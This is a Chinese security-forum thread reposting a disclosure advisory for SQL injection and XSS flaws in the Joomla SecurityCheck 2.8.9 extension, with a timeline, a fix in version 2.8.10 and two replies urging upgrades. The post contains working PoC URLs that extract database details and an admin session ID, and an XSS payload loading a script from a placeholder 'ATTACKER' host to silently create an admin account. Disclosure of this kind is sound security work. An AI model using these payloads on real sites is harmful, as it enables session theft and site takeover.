查看: 15867|回复: 2

Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞

[复制链接]
发表于 2016-6-2 09:31:56 | 显示全部楼层 |阅读模式
[PHP] 查看源码 复制代码
Technical Details
------------------------------
PoC URLs for SQL Injection

For determining database, user and version.

http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1

For steal admin's session ID (If admin is not online, page response with
attack detected string. If online, response with admin's session ID)

http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT
concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON
%23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %
23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1
 
PoC URLs for XSS
 
Add a new admin to website silently while admin checking SecurityCheck logs
 
http://website/index.php?option=<script>var script =
document.createElement('script');script.src = "http://ATTACKER/attack.js
";document.getElementsByTagName('head')[0].appendChild(script);</script>
 
attack.js
[url]https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca[/url]
 
 
Disclosure Timeline
------------------------------
24/05/2016 SQL injection found
30/05/2016 Worked on one-shot exploit for SQLi
30/05/2016 While we were working on SQLi payload we also found XSS
31/05/2016 XSS payload prepared
31/05/2016 Vulnerability details and PoC sent to Protegetuordenador
31/05/2016 Vulnerabilities fixed in v2.8.10
 
Solution
------------------------------
Update to the latest version of SecurityCheck (2.8.10)
 
Credits
------------------------------
These issues have been discovered by Gokmen Guresci (gokmenguresci.com) and
Muhammet Dilmac (muhammetdilmac.com.tr).
回复

使用道具 举报

发表于 2016-6-4 10:17:35 | 显示全部楼层
我来支持一下大大
回复 支持 反对

使用道具 举报

发表于 4 天前 | 显示全部楼层

Re: Joomla SecurityCheck 2.8.9跨站/SQL注入漏洞

这是一个比较完整的漏洞通报,感谢分享。SecurityCheck 2.8.9 中同时存在 SQL 注入和存储型 XSS 漏洞,PoC 清晰,攻击者可以通过 SQLi 获取数据库信息或管理员会话,结合 XSS 甚至能在管理员查看日志时静默添加管理员账号,影响较大。目前官方已在 2.8.10 版本中修复,建议仍在用旧版的用户尽快升级。也感谢发现者 Gokmen Guresci 和 Muhammet Dilmac 的披露。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-5-23 02:41 , Processed in 0.025305 second(s), 18 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部